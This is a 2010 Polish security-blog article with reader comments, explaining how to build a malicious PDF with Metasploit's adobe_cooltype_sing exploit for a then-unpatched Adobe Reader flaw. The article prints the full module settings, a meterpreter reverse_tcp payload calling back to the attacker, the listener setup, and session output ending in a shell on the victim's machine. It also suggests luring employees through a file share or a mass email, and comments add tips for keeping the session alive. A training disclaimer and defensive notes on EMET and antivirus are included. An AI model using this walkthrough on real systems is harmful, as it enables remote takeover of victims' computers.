12:47
14/9/2010

Kilka dni temu opisywaliśmy nową dziurę w PDF. Najnowsza wersja czytnika udostępniana na oficjalnej stronie Adobe dalej jest podatna na atak. Patcha nie ma, ale jest tygodniowy exploit 0day — poniżej pokazujemy jak zbudować złośliwego PDF-a i przejąć za jego pomocą kontrolę nad komputerem ofiary, która nieroztropnie kliknęła na taki plik.

Niebezpiecznik nie zachęca i nie pochwala ataków komputerowych! Poniższa instrukcja przeznaczona jest dla zespołów bezpieczeństwa i należy ją wykorzystywać jedynie w celach edukacyjno-demonstracyjnych, np. podczas szkoleń, które mają przekonać pracowników, że otwieranie załączników od nieznajomych może być tragiczne w skutkach.

Metasploit: 0day PDF Exploit

Do demonstracji wykorzystamy narzędzie Metasploit, o którym pisaliśmy już wielokrotnie.

Metasploit i ataki 0day na PDF

Metasploit i exploit 0day na PDF

Najnowsza wersja Metasploita posiada exploit o nazwie adobe_cooltype_sing, który pozwala zbudować “złośliwego” PDF-a wykorzystującego niezałataną jeszcze dziurę w Adobe Readerze:

msf exploit(adobe_cooltype_sing) > set filename raport_placowy.pdf
filename => raport_placowy.pdf
msf exploit(adobe_cooltype_sing) > set outputpath /Users/Niebezpiecznik
outputpath => /Users/Niebezpiecznik
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.133.7
LHOST => 192.168.133.7
msf exploit(adobe_cooltype_sing) > exploit

[*] Started reverse handler on 192.168.133.7:4444 
[*] Creating 'raport_placowy.pdf' file...
[*] Generated output file /Users/Niebezpiecznik/raport_placowy.pdf
[*] Exploit completed, but no session was created.

Teraz wystarczy skopiować plik raport_placowy.pdf i zostawić gdzieś na widoku (firmowy FTP?) albo “przez pomyłkę” wysłać do wszystkich pracowników e-mailem. Po otwarciu naszego PDF-a, komputer ofiary nawiąże połączenie z naszą maszyną. Aby je odebrać, należy wykonać następujące polecenia:

msf exploit(adobe_cooltype_sing) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.133.7
LHOST => 192.168.133.7
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.133.7:4444 
[*] Starting the payload handler...

Po otwarciu przez ofiarę pliku PDF zobaczymy:

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (748544 bytes) to 192.168.133.142
[*] Meterpreter session 1 opened (192.168.133.7:4444 -> 192.168.133.142:1189) at Tue Sep 14 11:18:04 +0200 2010

Teraz, komputer ofiary jest już pod naszą kontrolą i oprócz wielu brzydkich rzeczy, możemy m.in. uzyskać dostęp do shella:

meterpreter > shell
Process 1560 created.
Channel 1 created.
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Pulpit>echo "Wbrew regulaminowi sieci 
otworzyles zalacznik PDF od nieznanej osoby. Skontaktuj sie z administratorem sieci, 
twoje konto zostalo zawieszone." >> WAZNY_KOMUNIKAT.txt

Ciekaw jestem wyników z waszych firm… komentarze można umieszczać anonimowo :> Pamiętajcie tylko, że na tego typu “zabawy” z reguły musicie posiadać upoważnienie od “góry” — alternatywnie, możecie nas do tego wynająć ;)

Ochrona przed exploitem

Obecnie użytkownicy systemów Windows mają dwie opcje. Albo zrezygnować z wykorzystywania Adobe Readera do obsługi plików PDF (Foxit Reader jest jakąś alternatywą), albo nałożyć nań zabezpieczenia za pomocą darmowego, microsoftowego narzędzia EMET.

Przeczytaj także:

19 komentarzy

Dodaj komentarz
  1. Heh… fajny artykuł.

  2. “Shakuj kolegę dla (t)opornych” ;)

  3. A czy ktoś może zweryfikował czy ten EMET rzeczywiście zabezpiecza przed *tym* konkretnie exploitem? I na ile ten exploit jest już wykrywalny przez AV (można prosić o wrzucenie tego pliku na virustotal)?

  4. Sprawdziłem działanie lokalnie na połatanym XP SP3 i w mojej ocenie szału nie ma, przynajmniej z meterpreterem jako payload. Problem polega na tym, że exploit działa tylko do momentu zabicia wiszącego Acrobat Readera, a żaden rozgarnięty użytkownik nie będzie czekał dłużej niż kilkanaście sekund z ctrl-alt-del. Zaznaczam, że nie sprawdzałem innych systemów, może tam exploit ucieka w tło.

    Ponadto, dla osób które nie koniecznie oglądają screeny: pamiętajcie żeby wybrać exploit typu fileformat
    use exploit/windows/fileformat/adobe_cooltype_sing
    żebyście nie szukali nieistniejących zmiennych konfiguracyjnych, jak ja.

  5. Piotr Konieczny: dzięki za virustotal, chyba użytkownicy niektórych AV powinni się zastanowić nad swoim wyborem :) albo zainstalować foxit readera (otwiera plik bez problemu, exploit nie działa chociaż proces zajmuje po uruchomieniu ~200MB)

    olewales: “exploit działa tylko do momentu zabicia wiszącego Acrobat Readera”
    a funkcja migrate? działa nawet na zwykłym userze, przy oskryptowaniu handlera wystarczy tylko chwila żeby się zmigrować :)

    btw.1 EMET daje radę w tym przypadku (exploit nie wypala na XP SP3 i adobe reader v9.1), ale nie wystarczy EMET-a zainstalować, trzeba ręcznie dodać plik AcroRd32.exe i zdefiniować sposoby ochrony, wtedy działa

    btw.2 na Win7 bez EMET i adobe reader v9.3.3 exploit nie działa (może wyłączona java w AR?)

    btw.3 nie próbujcie za to włączać opcji “Maximum Security Settings” w EMET bo wejście na większość stron (w tym niebezpiecznik.pl) powoduje zamknięcie przeglądarki :) http://img52.imageshack.us/i/depiemet.jpg/ (tested on XP SP3 & IE7)

  6. Od jakiegoś czasu czytam Niebezpiecznika i coraz mniej mam ochotę komputer do Sieci podpinać…
    Nie ma tygodnia bez jakiegoś 0day’a na najpopularniejsze aplikacje, że o dziurach w Windzie nie wspomnę…

    @PK – może w ‘wolnym’ czasie podjęlibyście się napisania jakiegoś How-To jak zabezpieczyć komputer pracujący pod kontrolą systemu od MS ? (tylko nie pisać mi od odpinaniu kabla sieciowego… ;])
    Wiem, w sieci jest cała masa poradników, ale nie znalazłem takiego ‘wyczerpującego’. Większość porad jest w stylu ‘zainstaluj aktualizacje i antywirusa, do tego firewall’…

    Nie chodzi mi o poradnik krok-po-kroku, tylko o coś bardziej ogólnego, np. listę elementów systemu które trzeba zabezpieczyć.

  7. Czemu na waszej stronie przestaje mi działać scroll…

    • Tygrysek: bo przeglądarka ze strachu jest sparaliżowana ;-)
      Olewales: migrate? Zdążysz zanim user się zorientuje/ubije.

  8. Dzisiaj chciałem to przetestować u mnie na lanie, niestety antywajrus już się zawrzeszczał.

  9. @Olewales dokładnie jak Piotrek pisze – musisz szybko klikać, click click click!

  10. Tygrysek: Spróbuj kliknąć na tło newsa lub strony a jak to nie pomoże to na tło od tych tagów lub okienka blipa i powinno działać :)

    Co do tej demonstracji to zakładam że można ją wykonać jedynie na localhoscie przy użyciu metasploita? :P

  11. dvs: na win7 przy maximum security smiga bez problemow (przynajmniej na razie nie zauwazylem, przegladarki nie zamyka)

  12. Na Windows Vista ze wszystkimi możliwymi poprawkami, antywirusem AVG i Acrobatem 9.3.2 ten exploit działa. Tak jak pisał olewales, działa to do momentu zamknięcia zawieszonej przeglądarki pdf, więc ma raczej charakter Proof of Concept niż realnego narzędzia do ataku (chyba, że w pdfie przemycimy wirusa)

  13. No nie wiem, mnie się nie udaje zmigrować. Niby wszystko ok:
    meterpreter > migrate 956
    [*] Migrating to 956…
    [*] Migration completed successfully.
    meterpreter > getpid
    Current pid: 956
    Ale po zabiciu AcroRd32.exe połączenie się zrywa. Ktoś wie dlaczego? Metasploita mam dopiero pół godziny, a do tego pewnie łosiem jestem, więc wybaczie lame question.

  14. Wgranie podstawionego PDF na komputer chroniony m.in. przez Microsoft Security Essentials nie przejdzie – wykrywa explota w pliku. Nie wiem jak inne AV, ale jeśli też to wykrywają to wystarczy IMHO mieć aktualną bazę AV…

  15. […] Niedawno prezentowaliśmy też jak za pomoca odpowiednio zmodyfikowanego pliku PDF o nazwie “raport płacowy” można przejąć kontrolę nad komputerem […]

  16. […] Wystarczy, że ofiara wejdzie na odpowiednio spreparowaną stronę WWW, otworzy załącznik (np. plik PDF z rzekomą fakturą) i już atakujący ma wgląd w dane zgromadzone na dysku twardym ofiary, może nagrywać naciskane […]

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.